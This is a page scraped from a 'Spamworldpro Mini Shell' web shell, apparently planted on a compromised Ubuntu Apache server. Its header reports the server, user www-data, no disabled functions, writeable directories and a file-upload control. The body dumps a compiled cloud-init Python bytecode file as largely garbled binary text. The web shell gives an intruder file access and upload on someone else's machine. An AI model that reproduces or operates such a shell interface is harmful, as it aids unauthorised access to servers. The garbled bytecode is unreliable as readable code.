Spamworldpro Mini Shell
Spamworldpro


Server : Apache/2.4.52 (Ubuntu)
System : Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
User : www-data ( 33)
PHP Version : 8.1.2-1ubuntu2.21
Disable Function : NONE
Directory :  /lib/python3/dist-packages/cloudinit/reporting/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //lib/python3/dist-packages/cloudinit/reporting/__pycache__/events.cpython-310.pyc
o

}��f�#�@s�dZddlZddlZddlZddlmZddlmZm	Z	ddl
mZdZdZ
dZGd	d
�d
e�Zed�ZGdd
�d
�ZGdd�de�Zddd�Zejdfdd�Zdd�ZGdd�d�Zdd�ZdS)z�
events for reporting.

The events here are designed to be used with reporting.
They can be published to registered handlers with report_event.
�N)�List)�available_handlers�instantiated_handler_registry)�ReportingHandler�finish�start�	cloudinitc@seZdZdd�ZdS)�_namesetcCs||vr|Std|��)Nz%s not a valid value)�AttributeError)�self�name�r
�</usr/lib/python3/dist-packages/cloudinit/reporting/events.py�__getattr__sz_nameset.__getattr__N)�__name__�
__module__�__qualname__rr
r
r
rr	sr	)�SUCCESS�WARN�FAILc@s.eZdZdZedfdd�Zdd�Zdd�ZdS)	�ReportingEventz"Encapsulation of event formatting.NcCs2||_||_||_||_|durt��}||_dS�N)�
event_typer�description�origin�time�	timestamp)rrrrrrr
r
r�__init__)s
zReportingEvent.__init__cCsd�|j|j|j�S)z"The event represented as a string.z
{0}: {1}: {2})�formatrrr�rr
r
r�	as_string9s�zReportingEvent.as_stringcCs|j|j|j|j|jd�S)z&The event represented as a dictionary.�rrrrrr!rr
r
r�as_dict?s�zReportingEvent.as_dict)rrr�__doc__�DEFAULT_EVENT_ORIGINrr r"r
r
r
rr&s
�rcs8eZdZejdf�fdd�	Zdd�Z�fdd�Z�ZS)�FinishReportingEventNcsDtt|��t||�||_|durg}||_|tvr td|��dS)NzInvalid result: %s)�superr%r�FINISH_EVENT_TYPE�result�
post_files�status�
ValueError)rrrr(r)��	__class__r
rrKs
��zFinishReportingEvent.__init__cCsd�|j|j|j|j�S)Nz{0}: {1}: {2}: {3})rrrr(rrr
r
rr Xs�zFinishReportingEvent.as_stringcs0tt|���}|j|d<|jrt|j�|d<|S)z'The event represented as json friendly.r(�files)r&r%r"r(r)�_collect_file_info)r�datar,r
rr"]s

zFinishReportingEvent.as_dict)	rrrr*rrr r"�
__classcell__r
r
r,rr%Js
�
r%csT�si��fdd�tj��D�}ttj���}|D]}t|�|vr"q|�|�qdS)a�Report an event to all registered event handlers
    except those whose type is in excluded_handler_types.

    This should generally be called via one of the other functions in
    the reporting module.

    :param excluded_handler_types:
         List of handlers types to exclude from reporting the event to.
    :param event_type:
        The type of the event; this should be a constant from the
        reporting module.
    csh|]
\}}|�vr|�qSr
r
)�.0�	hndl_type�hndl_cls��excluded_handler_typesr
r�	<setcomp>vs
�zreport_event.<locals>.<setcomp>N)r�registered_items�items�listr�values�type�
publish_event)�eventr6�excluded_handler_classes�handlers�handlerr
r5r�report_eventfs
���rBcCst||||d�}t|�S)zVReport a "finish" event.

    See :py:func:`.report_event` for parameter details.
    �r))r%rB)�
event_name�event_descriptionr(r)r>r
r
r�report_finish_event�s�rFcCstt||�}t|�S)a'Report a "start" event.

    :param event_name:
        The name of the event; this should be a topic which events would
        share (e.g. it will be the same for start and finish events).

    :param event_description:
        A human-readable description of the event that has occurred.
    )r�START_EVENT_TYPErB)rDrEr>r
r
r�report_start_event�s
rHc@s�eZdZdZdddejdfdd�Zdd�Zdd�Zd	d
�Z	e
dd��Zejd
d��Ze
dd��Z
e
jdd��Z
dd�Zdd�ZdS)�ReportEventStackaKContext Manager for using :py:func:`report_event`

    This enables calling :py:func:`report_start_event` and
    :py:func:`report_finish_event` through a context manager.

    :param name:
        the name of the event

    :param description:
        the event's description, passed on to :py:func:`report_start_event`

    :param message:
        the description to use for the finish event. defaults to
        :param:description.

    :param parent:
    :type parent: :py:class:ReportEventStack or None
        The parent of this event.  The parent is populated with
        results of all its children.  The name used in reporting
        is <parent.name>/<name>

    :param reporting_enabled:
        Indicates if reporting events should be generated.
        If not provided, defaults to the parent's value, or True if no parent
        is provided.

    :param result_on_exception:
        The result value to set if an exception is caught. default
        value is FAIL.

    :param post_files:
        Can hold filepaths of files that are to get posted/created
        regarding a given event. Something like success or failure information
        in a given log file. For each filepath, if it's a valid regular file
        it will get: read & encoded as base64 at the close of the event.
        Default value, if None, is an empty list.
    NcCs�||_||_||_||_||_tj|_|durg}||_|dur(|r&|j	}nd}||_	|r7d�
|j|f�|_n|j|_i|_dS)NT�/)
�parentrr�message�result_on_exceptionr*rr(r)�reporting_enabled�join�fullname�children)rrrrLrKrNrMr)r
r
rr�s,
��
zReportEventStack.__init__cCsd|j|j|jfS)Nz.ReportEventStack(%s, %s, reporting_enabled=%s))rrrNrr
r
r�__repr__�s
�zReportEventStack.__repr__cCs4tj|_|jrt|j|j�|jrd|jj|j	<|S)N)NN)
r*rr(rNrHrPrrKrQrrr
r
r�	__enter__�szReportEventStack.__enter__cCsPtjtjfD]}|j��D]\}\}}||kr ||jfSq
q|j|jfSr)r*rrrQr9rLr()r�cand_result�_name�value�_msgr
r
r�_childrens_finish_info�s��z'ReportEventStack._childrens_finish_infocCs|jSr)�_resultrr
r
rr(szReportEventStack.resultcCs|tvr
td|��||_dS)Nz'%s' not a valid result)r*r+rY�rrVr
r
rr(s
cCs|jdur|jS|jSr)�_messagerrr
r
rrLs
zReportEventStack.messagecCs
||_dSr)r[rZr
r
rrLs
cCs|r|j|jfS|��Sr)rMrLrX)r�excr
r
r�_finish_infoszReportEventStack._finish_infocCsH|�|�\}}|jr||f|jj|j<|jr"t|j|||jd�dSdS)NrC)r]rKrQrrNrFrPr))r�exc_type�	exc_value�	tracebackr(�msgr
r
r�__exit__s
��zReportEventStack.__exit__)rrrr#r*rrrRrSrX�propertyr(�setterrLr]rbr
r
r
rrI�s**
�'



rIc	Csz|sdSg}|D]2}tj�|�sd}nt|d��}t�|�����}Wd�n1s,wY|�||dd��q|S)N�rb�base64)�path�content�encoding)	�osrg�isfile�openrf�	b64encode�read�decode�append)r.�ret�fnamerh�fpr
r
rr/(s�r/r)r#rf�os.pathrjr�typingr�cloudinit.reportingrr�cloudinit.reporting.handlersrr'rGr$�setr	r*rr%rBrrFrHrIr/r
r
r
r�<module>s*$
 
�
	

Spamworldpro Mini